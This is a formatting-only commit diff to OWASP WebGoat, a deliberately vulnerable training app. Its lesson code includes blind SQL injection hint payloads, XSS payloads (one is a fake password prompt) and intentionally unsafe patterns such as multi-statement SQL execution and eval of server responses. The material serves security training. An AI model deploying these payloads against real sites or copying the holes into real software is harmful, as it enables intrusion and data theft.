Formatting according to OWASP WebGoat Java Style
git-svn-id: http://webgoat.googlecode.com/svn/trunk@359 4033779f-a91e-0410-96ef-6bf7bf53c507
This commit is contained in:
brandon.devries
parent
acab6e9274
commit
ba6560b24a
@ -11,7 +11,6 @@ import java.sql.ResultSet;
|
||||
import java.sql.SQLException;
|
||||
import java.sql.Statement;
|
||||
import java.util.List;
|
||||
|
||||
import org.apache.ecs.Element;
|
||||
import org.apache.ecs.ElementContainer;
|
||||
import org.apache.ecs.StringElement;
|
||||
@ -504,9 +503,9 @@ public abstract class AbstractLesson extends Screen implements Comparable<Object
|
||||
{
|
||||
s.setMessage("Could not find source file");
|
||||
src = ("Could not find the source file or source file does not exist.<br/>"
|
||||
+ "Send this message to: <a href=\"mailto:" + s.getWebgoatContext().getFeedbackAddress() + "?subject=Source "
|
||||
+ getSourceFileName() + " not found. Lesson: " + s.getCurrentLesson().getLessonName() + "\">" +
|
||||
s.getWebgoatContext().getFeedbackAddress() + "</a>");
|
||||
+ "Send this message to: <a href=\"mailto:" + s.getWebgoatContext().getFeedbackAddress()
|
||||
+ "?subject=Source " + getSourceFileName() + " not found. Lesson: "
|
||||
+ s.getCurrentLesson().getLessonName() + "\">" + s.getWebgoatContext().getFeedbackAddress() + "</a>");
|
||||
}
|
||||
|
||||
Html html = new Html();
|
||||
@ -537,9 +536,9 @@ public abstract class AbstractLesson extends Screen implements Comparable<Object
|
||||
{
|
||||
s.setMessage("Could not find the solution file");
|
||||
src = ("Could not find the solution file or solution file does not exist.<br/>"
|
||||
+ "Send this message to: <a href=\"mailto:" + s.getWebgoatContext().getFeedbackAddress() + "?subject=Solution "
|
||||
+ getLessonSolutionFileName() + " not found. Lesson: " + s.getCurrentLesson().getLessonName() + "\">" +
|
||||
s.getWebgoatContext().getFeedbackAddress() + "</a>");
|
||||
+ "Send this message to: <a href=\"mailto:" + s.getWebgoatContext().getFeedbackAddress()
|
||||
+ "?subject=Solution " + getLessonSolutionFileName() + " not found. Lesson: "
|
||||
+ s.getCurrentLesson().getLessonName() + "\">" + s.getWebgoatContext().getFeedbackAddress() + "</a>");
|
||||
}
|
||||
|
||||
// Solutions are html files
|
||||
|
||||
@ -81,7 +81,8 @@ public class BackDoors extends SequentialLessonAdapter
|
||||
|
||||
private void addDBEntriesToEC(ElementContainer ec, ResultSet rs)
|
||||
{
|
||||
try {
|
||||
try
|
||||
{
|
||||
if (rs.next())
|
||||
{
|
||||
Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(1);
|
||||
@ -112,7 +113,8 @@ public class BackDoors extends SequentialLessonAdapter
|
||||
}
|
||||
ec.addElement(t);
|
||||
}
|
||||
} catch (SQLException e) {
|
||||
} catch (SQLException e)
|
||||
{
|
||||
// TODO Auto-generated catch block
|
||||
e.printStackTrace();
|
||||
}
|
||||
@ -166,8 +168,7 @@ public class BackDoors extends SequentialLessonAdapter
|
||||
userInput = SELECT_ST + userInput;
|
||||
String[] arrSQL = userInput.split(";");
|
||||
Connection conn = DatabaseUtilities.getConnection(s);
|
||||
Statement statement = conn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
|
||||
ResultSet.CONCUR_READ_ONLY);
|
||||
Statement statement = conn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
|
||||
|
||||
if (arrSQL.length == 2)
|
||||
{
|
||||
@ -179,7 +180,6 @@ public class BackDoors extends SequentialLessonAdapter
|
||||
ResultSet rs = statement.executeQuery(arrSQL[0]);
|
||||
addDBEntriesToEC(ec, rs);
|
||||
|
||||
|
||||
}
|
||||
return ec;
|
||||
}
|
||||
|
||||
@ -144,7 +144,6 @@ public class BlindSqlInjection extends LessonAdapter
|
||||
return new StringElement("By Chuck Willis");
|
||||
}
|
||||
|
||||
|
||||
/**
|
||||
* Gets the hints attribute of the DatabaseFieldScreen object
|
||||
*
|
||||
@ -174,11 +173,9 @@ public class BlindSqlInjection extends LessonAdapter
|
||||
+ ") , 1 , 1) ) < 77 ); "
|
||||
+ "<br><br>If you get back that account number is valid, then yes. If get back that the number is"
|
||||
+ "invalid then answer is no.");
|
||||
hints.add("Another example: is the second character of the first_name of userid "
|
||||
+ TARGET_ACCT_NUM
|
||||
hints.add("Another example: is the second character of the first_name of userid " + TARGET_ACCT_NUM
|
||||
+ " greater than 'm' (ascii 109)? "
|
||||
+ "<br><br>101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid="
|
||||
+ TARGET_ACCT_NUM
|
||||
+ "<br><br>101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=" + TARGET_ACCT_NUM
|
||||
+ ") , 2 , 1) ) > 109 ); "
|
||||
+ "<br><br>If you get back that account number is valid, then yes. If get back that the number is "
|
||||
+ "invalid then answer is no.");
|
||||
|
||||
@ -282,7 +282,6 @@ public class Challenge2Screen extends SequentialLessonAdapter
|
||||
*/
|
||||
/*
|
||||
* (non-Javadoc)
|
||||
*
|
||||
* @see lessons.LessonAdapter#doStage3(session.WebSession)
|
||||
*/
|
||||
protected Element doStage3(WebSession s) throws Exception
|
||||
|
||||
@ -96,8 +96,6 @@ public class ClientSideFiltering extends SequentialLessonAdapter
|
||||
t.setID("hiddenEmployeeRecords");
|
||||
t.setStyle("display: none");
|
||||
|
||||
|
||||
|
||||
workspaceDiv.addElement(t);
|
||||
|
||||
t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
|
||||
@ -334,7 +332,8 @@ public class ClientSideFiltering extends SequentialLessonAdapter
|
||||
|
||||
hints.add("Stage 1: Use Firebug to find where the information is stored on the client side.");
|
||||
|
||||
hints.add("Stage 1: Examine the hidden table to see if there is anyone listed who is not in the drop down menu.");
|
||||
hints
|
||||
.add("Stage 1: Examine the hidden table to see if there is anyone listed who is not in the drop down menu.");
|
||||
|
||||
hints.add("Stage 1: Look in the last row of the hidden table.");
|
||||
|
||||
|
||||
@ -154,9 +154,7 @@ public class ConcurrencyCart extends LessonAdapter
|
||||
}
|
||||
|
||||
/*
|
||||
* ********************************************************************* ******************
|
||||
* PURCHASING PAGE **********************************
|
||||
* *********************************************************************
|
||||
* PURCHASING PAGE
|
||||
*/
|
||||
|
||||
private ElementContainer createPurchaseContent(WebSession s, int quantity1, int quantity2, int quantity3,
|
||||
@ -303,9 +301,7 @@ public class ConcurrencyCart extends LessonAdapter
|
||||
}
|
||||
|
||||
/*
|
||||
* ********************************************************************* ******************
|
||||
* CONFIRMATION PAGE ********************************
|
||||
* *********************************************************************
|
||||
* CONFIRMATION PAGE
|
||||
*/
|
||||
|
||||
private ElementContainer confirmation(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4)
|
||||
@ -420,9 +416,7 @@ public class ConcurrencyCart extends LessonAdapter
|
||||
}
|
||||
|
||||
/*
|
||||
* ********************************************************************* ******************
|
||||
* SHOPPING PAGE **********************************
|
||||
* *********************************************************************
|
||||
* SHOPPING PAGE
|
||||
*/
|
||||
|
||||
private ElementContainer createShoppingPage(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4)
|
||||
|
||||
@ -99,8 +99,8 @@ public class CrossSiteScripting extends GoatHillsFinancial
|
||||
return Category.XSS;
|
||||
}
|
||||
|
||||
|
||||
public String getLessonSolutionFileName(WebSession s) {
|
||||
public String getLessonSolutionFileName(WebSession s)
|
||||
{
|
||||
String solutionFileName = null;
|
||||
String stage = getStage(s);
|
||||
solutionFileName = "/lesson_solutions/Lab XSS/Lab " + stage + ".html";
|
||||
@ -108,13 +108,15 @@ public class CrossSiteScripting extends GoatHillsFinancial
|
||||
}
|
||||
|
||||
@Override
|
||||
public String getSolution(WebSession s) {
|
||||
public String getSolution(WebSession s)
|
||||
{
|
||||
String src = null;
|
||||
|
||||
try
|
||||
{
|
||||
// System.out.println("Solution: " + getLessonSolutionFileName(s));
|
||||
src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))), false);
|
||||
src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))),
|
||||
false);
|
||||
} catch (IOException e)
|
||||
{
|
||||
s.setMessage("Could not find the solution file");
|
||||
@ -148,9 +150,9 @@ public class CrossSiteScripting extends GoatHillsFinancial
|
||||
|
||||
// Stage 3
|
||||
|
||||
|
||||
// Stage 4
|
||||
hints.add("Stage4: Examine content served in response to form submissions looking for data taken from the form.");
|
||||
hints
|
||||
.add("Stage4: Examine content served in response to form submissions looking for data taken from the form.");
|
||||
hints.add("Stage4: There is a class called HtmlEncoder in org.owasp.webgoat.util");
|
||||
// Stage 5
|
||||
hints
|
||||
@ -179,8 +181,8 @@ public class CrossSiteScripting extends GoatHillsFinancial
|
||||
}
|
||||
else if (STAGE2.equals(stage))
|
||||
{
|
||||
instructions = "Stage 2: Block Stored XSS using Input Validation.<br><br>" +
|
||||
"<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
|
||||
instructions = "Stage 2: Block Stored XSS using Input Validation.<br><br>"
|
||||
+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
|
||||
+ "Implement a fix to block the stored XSS before it can be written to the database. "
|
||||
+ "Repeat stage 1 as 'Eric' with 'David' as the manager. Verify that 'David' is not affected by the attack.";
|
||||
}
|
||||
@ -192,8 +194,8 @@ public class CrossSiteScripting extends GoatHillsFinancial
|
||||
}
|
||||
else if (STAGE4.equals(stage))
|
||||
{
|
||||
instructions = "Stage 4: Block Stored XSS using Output Encoding.<br><br>" +
|
||||
"<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
|
||||
instructions = "Stage 4: Block Stored XSS using Output Encoding.<br><br>"
|
||||
+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
|
||||
+ "Implement a fix to block XSS after it is read from the database. "
|
||||
+ "Repeat stage 3. Verify that 'David' is not affected by Bruce's profile attack.";
|
||||
}
|
||||
@ -205,8 +207,8 @@ public class CrossSiteScripting extends GoatHillsFinancial
|
||||
}
|
||||
else if (STAGE6.equals(stage))
|
||||
{
|
||||
instructions = "Stage 6: Block Reflected XSS using Input Validation.<br><br>" +
|
||||
"<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
|
||||
instructions = "Stage 6: Block Reflected XSS using Input Validation.<br><br>"
|
||||
+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
|
||||
+ "Implement a fix to block this reflected XSS attack. "
|
||||
+ "Repeat step 5. Verify that the attack URL is no longer effective.";
|
||||
}
|
||||
|
||||
@ -97,8 +97,8 @@ public class EditProfile extends DefaultLessonAction
|
||||
.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
|
||||
.getString("disciplined_notes"), answer_results.getString("personal_description"));
|
||||
/*
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
|
||||
* profile.getLastName() + " (" + profile.getId() + ")");
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() +
|
||||
* " " + profile.getLastName() + " (" + profile.getId() + ")");
|
||||
*/}
|
||||
} catch (SQLException sqle)
|
||||
{
|
||||
@ -141,8 +141,8 @@ public class EditProfile extends DefaultLessonAction
|
||||
.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
|
||||
.getString("disciplined_notes"), answer_results.getString("personal_description"));
|
||||
/*
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
|
||||
* profile.getLastName() + " (" + profile.getId() + ")");
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() +
|
||||
* " " + profile.getLastName() + " (" + profile.getId() + ")");
|
||||
*/}
|
||||
} catch (SQLException sqle)
|
||||
{
|
||||
|
||||
@ -171,8 +171,8 @@ public class FindProfile extends DefaultLessonAction
|
||||
.getString("disciplined_notes"), answer_results.getString("personal_description"));
|
||||
|
||||
/*
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
|
||||
* profile.getLastName() + " (" + profile.getId() + ")");
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() +
|
||||
* " " + profile.getLastName() + " (" + profile.getId() + ")");
|
||||
*/
|
||||
setRequestAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ID, Integer.toString(id));
|
||||
}
|
||||
|
||||
@ -130,7 +130,6 @@ public class UpdateProfile extends DefaultLessonAction
|
||||
String disciplinaryActionNotes = request.getParameter(CrossSiteScripting.DISCIPLINARY_NOTES);
|
||||
String personalDescription = request.getParameter(CrossSiteScripting.DESCRIPTION);
|
||||
|
||||
|
||||
Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2,
|
||||
manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
|
||||
personalDescription);
|
||||
|
||||
@ -4,7 +4,6 @@ package org.owasp.webgoat.lessons.CrossSiteScripting;
|
||||
import java.sql.ResultSet;
|
||||
import java.sql.SQLException;
|
||||
import java.sql.Statement;
|
||||
|
||||
import org.apache.ecs.xhtml.html;
|
||||
import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
|
||||
import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
|
||||
@ -16,7 +15,6 @@ import org.owasp.webgoat.session.UnauthorizedException;
|
||||
import org.owasp.webgoat.session.ValidationException;
|
||||
import org.owasp.webgoat.session.WebSession;
|
||||
import org.owasp.webgoat.util.HtmlEncoder;
|
||||
|
||||
import com.sun.corba.se.spi.activation.Server;
|
||||
|
||||
|
||||
@ -92,7 +90,6 @@ public class ViewProfile extends DefaultLessonAction
|
||||
{
|
||||
Employee profile = null;
|
||||
|
||||
|
||||
// Query the database for the profile data of the given employee
|
||||
try
|
||||
{
|
||||
@ -108,15 +105,15 @@ public class ViewProfile extends DefaultLessonAction
|
||||
// Note: Do NOT get the password field.
|
||||
profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
|
||||
answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
|
||||
.getString("title"), answer_results.getString("phone"),
|
||||
answer_results.getString("address1"), answer_results.getString("address2"), answer_results
|
||||
.getString("title"), answer_results.getString("phone"), answer_results
|
||||
.getString("address1"), answer_results.getString("address2"), answer_results
|
||||
.getInt("manager"), answer_results.getString("start_date"), answer_results
|
||||
.getInt("salary"), answer_results.getString("ccn"), answer_results
|
||||
.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
|
||||
.getString("disciplined_notes"), answer_results.getString("personal_description"));
|
||||
/*
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
|
||||
* profile.getLastName() + " (" + profile.getId() + ")");
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() +
|
||||
* " " + profile.getLastName() + " (" + profile.getId() + ")");
|
||||
*/}
|
||||
} catch (SQLException sqle)
|
||||
{
|
||||
@ -132,7 +129,6 @@ public class ViewProfile extends DefaultLessonAction
|
||||
return profile;
|
||||
}
|
||||
|
||||
|
||||
public Employee getEmployeeProfile_BACKUP(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
|
||||
{
|
||||
// Query the database to determine if this employee has access to this function
|
||||
@ -163,10 +159,9 @@ public class ViewProfile extends DefaultLessonAction
|
||||
.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
|
||||
.getString("disciplined_notes"), answer_results.getString("personal_description"));
|
||||
|
||||
|
||||
/*
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
|
||||
* profile.getLastName() + " (" + profile.getId() + ")");
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() +
|
||||
* " " + profile.getLastName() + " (" + profile.getId() + ")");
|
||||
*/}
|
||||
} catch (SQLException sqle)
|
||||
{
|
||||
|
||||
@ -124,8 +124,8 @@ public class DBCrossSiteScripting extends GoatHillsFinancial
|
||||
String stage = getStage(s);
|
||||
if (STAGE1.equals(stage))
|
||||
{
|
||||
instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.<br><br>"+
|
||||
"<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
|
||||
instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.<br><br>"
|
||||
+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
|
||||
+ "As 'Tom', execute a Stored XSS attack against the Street field on the Edit Profile page. "
|
||||
+ "Verify that 'Jerry' is affected by the attack. "
|
||||
+ "A sample JavaScript snippet you can use is: <SCRIPT>alert('bang!');</SCRIPT>.";
|
||||
|
||||
@ -74,7 +74,6 @@ public class DOMInjection extends LessonAdapter
|
||||
s.getResponse().setHeader("Cache-Control", "no-cache");
|
||||
PrintWriter out = new PrintWriter(s.getResponse().getOutputStream());
|
||||
|
||||
|
||||
out.print("document.forms[0].SUBMIT.disabled = false;");
|
||||
out.flush();
|
||||
out.close();
|
||||
@ -91,10 +90,10 @@ public class DOMInjection extends LessonAdapter
|
||||
|
||||
setContent(form);
|
||||
}
|
||||
|
||||
protected Element createContent(WebSession s)
|
||||
{
|
||||
|
||||
|
||||
ElementContainer ec = new ElementContainer();
|
||||
|
||||
if (s.getRequest().getMethod().equalsIgnoreCase("POST"))
|
||||
@ -103,9 +102,7 @@ public class DOMInjection extends LessonAdapter
|
||||
}
|
||||
|
||||
String lineSep = System.getProperty("line.separator");
|
||||
String script = "<script>" + lineSep
|
||||
+ "function validate() {"
|
||||
+ lineSep
|
||||
String script = "<script>" + lineSep + "function validate() {" + lineSep
|
||||
+ "var keyField = document.getElementById('key');" + lineSep + "var url = '" + getLink()
|
||||
+ "&from=ajax&key=' + encodeURIComponent(keyField.value);" + lineSep
|
||||
+ "if (typeof XMLHttpRequest != 'undefined') {" + lineSep + "req = new XMLHttpRequest();" + lineSep
|
||||
@ -113,18 +110,13 @@ public class DOMInjection extends LessonAdapter
|
||||
+ lineSep + " }" + lineSep + " req.open('GET', url, true);" + lineSep
|
||||
+ " req.onreadystatechange = callback;" + lineSep + " req.send(null);" + lineSep + "}" + lineSep
|
||||
+ "function callback() {" + lineSep + " if (req.readyState == 4) { " + lineSep
|
||||
+ " if (req.status == 200) { " + lineSep + " var message = req.responseText;" + lineSep
|
||||
+ " var result = req.responseXML.getElementsByTagName('reward');" + lineSep
|
||||
+ " var messageDiv = document.getElementById('MessageDiv');" + lineSep
|
||||
+ " try {" + lineSep
|
||||
+ " if (req.status == 200) { " + lineSep + " var message = req.responseText;"
|
||||
+ lineSep + " var result = req.responseXML.getElementsByTagName('reward');" + lineSep
|
||||
+ " var messageDiv = document.getElementById('MessageDiv');" + lineSep + " try {" + lineSep
|
||||
+ " eval(message);" + lineSep + " " + lineSep
|
||||
+ " messageDiv.innerHTML = 'Correct licence Key.' " + lineSep
|
||||
+ " }" + lineSep
|
||||
+ " catch(err)" + lineSep
|
||||
+ " { " + lineSep
|
||||
+ " messageDiv.innerHTML = 'Wrong license key.'" + lineSep
|
||||
+ "} " + lineSep
|
||||
+ " }}}" + lineSep + "</script>" + lineSep;
|
||||
+ " messageDiv.innerHTML = 'Correct licence Key.' " + lineSep + " }" + lineSep
|
||||
+ " catch(err)" + lineSep + " { " + lineSep + " messageDiv.innerHTML = 'Wrong license key.'"
|
||||
+ lineSep + "} " + lineSep + " }}}" + lineSep + "</script>" + lineSep;
|
||||
|
||||
ec.addElement(new StringElement(script));
|
||||
ec.addElement(new BR().addElement(new H1().addElement("Welcome to WebGoat Registration Page:")));
|
||||
@ -147,7 +139,6 @@ public class DOMInjection extends LessonAdapter
|
||||
|
||||
t1.addElement(tr);
|
||||
|
||||
|
||||
tr = new TR();
|
||||
Input b = new Input();
|
||||
b.setType(Input.SUBMIT);
|
||||
|
||||
@ -183,13 +183,16 @@ public class DOMXSS extends SequentialLessonAdapter
|
||||
|
||||
hints.add("Stage 2: Try entering the following: " + "<img src=x onerror=;;alert('XSS') />");
|
||||
|
||||
hints.add("Stage 3: Try entering the following: " + "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>");
|
||||
hints.add("Stage 3: Try entering the following: "
|
||||
+ "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>");
|
||||
|
||||
hints.add("Stage 4: Try entering the following: "
|
||||
hints
|
||||
.add("Stage 4: Try entering the following: "
|
||||
+ "Please enter your password:<BR><input type = \"password\" name=\"pass\"/><button "
|
||||
+ "onClick=\"javascript:alert('I have your password: ' + pass.value);\">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>");
|
||||
|
||||
hints.add("Stage 5: You will find the JavaScripts in tomcat\\webapps\\WebGoat\\javascript (Standart Version) or in WebContent\\javascript (Developer Version).");
|
||||
hints
|
||||
.add("Stage 5: You will find the JavaScripts in tomcat\\webapps\\WebGoat\\javascript (Standart Version) or in WebContent\\javascript (Developer Version).");
|
||||
// Attack Strings:
|
||||
|
||||
// <IMG SRC="images/logos/owasp.jpg"/>
|
||||
@ -201,7 +204,8 @@ public class DOMXSS extends SequentialLessonAdapter
|
||||
// Please enter your password:<BR><input type = "password" name="pass"/><button
|
||||
// onClick="javascript:alert('I
|
||||
// have your password: ' +
|
||||
// pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>
|
||||
// pass.value);
|
||||
// ">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>
|
||||
|
||||
return hints;
|
||||
}
|
||||
|
||||
@ -4,7 +4,6 @@ package org.owasp.webgoat.lessons;
|
||||
import java.util.ArrayList;
|
||||
import java.util.List;
|
||||
import java.util.regex.Pattern;
|
||||
|
||||
import org.apache.ecs.Element;
|
||||
import org.apache.ecs.ElementContainer;
|
||||
import org.apache.ecs.html.A;
|
||||
|
||||
@ -95,8 +95,8 @@ public class EditProfile extends DefaultLessonAction
|
||||
.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
|
||||
.getString("disciplined_notes"), answer_results.getString("personal_description"));
|
||||
/*
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
|
||||
* profile.getLastName() + " (" + profile.getId() + ")");
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() +
|
||||
* " " + profile.getLastName() + " (" + profile.getId() + ")");
|
||||
*/}
|
||||
} catch (SQLException sqle)
|
||||
{
|
||||
|
||||
@ -139,8 +139,8 @@ public class FindProfile extends DefaultLessonAction
|
||||
.getString("disciplined_notes"), answer_results.getString("personal_description"));
|
||||
|
||||
/*
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
|
||||
* profile.getLastName() + " (" + profile.getId() + ")");
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() +
|
||||
* " " + profile.getLastName() + " (" + profile.getId() + ")");
|
||||
*/
|
||||
setRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID, Integer.toString(id));
|
||||
}
|
||||
|
||||
@ -104,8 +104,8 @@ public class ViewProfile extends DefaultLessonAction
|
||||
.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
|
||||
.getString("disciplined_notes"), answer_results.getString("personal_description"));
|
||||
/*
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
|
||||
* profile.getLastName() + " (" + profile.getId() + ")");
|
||||
* System.out.println("Retrieved employee from db: " + profile.getFirstName() +
|
||||
* " " + profile.getLastName() + " (" + profile.getId() + ")");
|
||||
*/}
|
||||
} catch (SQLException sqle)
|
||||
{
|
||||
|
||||
@ -294,8 +294,8 @@ public class HttpOnly extends LessonAdapter
|
||||
t.addElement(tr);
|
||||
|
||||
/*
|
||||
* tr.addElement(new TD(new StringElement("<strong>Status:</strong> " )));
|
||||
* t.addElement(tr); if(httpOnly == true) { tr.addElement(new TD(new StringElement("<div
|
||||
* tr.addElement(new TD(new StringElement("<strong>Status:</strong> " ))); t.addElement(tr);
|
||||
* if(httpOnly == true) { tr.addElement(new TD(new StringElement("<div
|
||||
* id=\"status\">On</div>"))); } else { tr.addElement(new TD(new StringElement ("<div
|
||||
* id=\"status\">Off</div>"))); } t.addElement(tr); t.addElement(new TR(new TD(new
|
||||
* StringElement("<br/>"))));
|
||||
|
||||
@ -6,7 +6,6 @@ import java.sql.PreparedStatement;
|
||||
import java.sql.ResultSet;
|
||||
import java.util.ArrayList;
|
||||
import java.util.List;
|
||||
|
||||
import org.apache.ecs.Element;
|
||||
import org.apache.ecs.ElementContainer;
|
||||
import org.apache.ecs.StringElement;
|
||||
@ -24,7 +23,6 @@ import org.owasp.webgoat.session.DatabaseUtilities;
|
||||
import org.owasp.webgoat.session.WebSession;
|
||||
|
||||
|
||||
|
||||
public class InsecureLogin extends SequentialLessonAdapter
|
||||
{
|
||||
|
||||
@ -47,7 +45,8 @@ public class InsecureLogin extends SequentialLessonAdapter
|
||||
}
|
||||
|
||||
@Override
|
||||
protected Element doStage1(WebSession s) throws Exception {
|
||||
protected Element doStage1(WebSession s) throws Exception
|
||||
{
|
||||
String answer = s.getParser().getStringParameter(ANSWER, "");
|
||||
if (answer.equals("sniffy"))
|
||||
{
|
||||
@ -58,7 +57,8 @@ public class InsecureLogin extends SequentialLessonAdapter
|
||||
}
|
||||
|
||||
@Override
|
||||
protected Element doStage2(WebSession s) throws Exception {
|
||||
protected Element doStage2(WebSession s) throws Exception
|
||||
{
|
||||
String protocol = s.getParser().getStringParameter(PROTOCOL, "");
|
||||
String yesno = s.getParser().getStringParameter(YESNO, "");
|
||||
|
||||
@ -72,6 +72,7 @@ public class InsecureLogin extends SequentialLessonAdapter
|
||||
|
||||
/**
|
||||
* Creation of the main content
|
||||
*
|
||||
* @param s
|
||||
* @return Element
|
||||
*/
|
||||
@ -83,7 +84,8 @@ public class InsecureLogin extends SequentialLessonAdapter
|
||||
{
|
||||
style sty = new style();
|
||||
|
||||
sty.addElement("#lesson_wrapper {height: 435px;width: 500px;}#lesson_header {background-image: url(lessons/DBSQLInjection/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}.lesson_workspace {background-image: url(lessons/DBSQLInjection/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;} .lesson_text {height: 240px;width: 460px;padding-top: 5px;} #lesson_buttons_bottom {height: 20px;width: 460px;} #lesson_b_b_left {width: 300px;float: left;} #lesson_b_b_right input {width: 100px;float: right;} .lesson_title_box {height: 20px;width: 420px;padding-left: 30px;} .lesson_workspace { } .lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;} .lesson_text_db {color: #0066FF} #lesson_login {background-image: url(lessons/DBSQLInjection/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;} #lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;} #lesson_search {background-image: url(lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}");
|
||||
sty
|
||||
.addElement("#lesson_wrapper {height: 435px;width: 500px;}#lesson_header {background-image: url(lessons/DBSQLInjection/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}.lesson_workspace {background-image: url(lessons/DBSQLInjection/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;} .lesson_text {height: 240px;width: 460px;padding-top: 5px;} #lesson_buttons_bottom {height: 20px;width: 460px;} #lesson_b_b_left {width: 300px;float: left;} #lesson_b_b_right input {width: 100px;float: right;} .lesson_title_box {height: 20px;width: 420px;padding-left: 30px;} .lesson_workspace { } .lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;} .lesson_text_db {color: #0066FF} #lesson_login {background-image: url(lessons/DBSQLInjection/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;} #lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;} #lesson_search {background-image: url(lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}");
|
||||
ec.addElement(sty);
|
||||
|
||||
Div wrapperDiv = new Div();
|
||||
@ -121,9 +123,11 @@ public class InsecureLogin extends SequentialLessonAdapter
|
||||
|
||||
/**
|
||||
* Create content for logging in
|
||||
*
|
||||
* @param ec
|
||||
*/
|
||||
private Element createLogInContent() {
|
||||
private Element createLogInContent()
|
||||
{
|
||||
ElementContainer ec = new ElementContainer();
|
||||
Div loginDiv = new Div();
|
||||
loginDiv.setID("lesson_login");
|
||||
@ -146,7 +150,6 @@ public class InsecureLogin extends SequentialLessonAdapter
|
||||
tr2.addElement(td3);
|
||||
tr2.addElement(td4);
|
||||
|
||||
|
||||
TR tr3 = new TR();
|
||||
TD td5 = new TD();
|
||||
td5.setColSpan(2);
|
||||
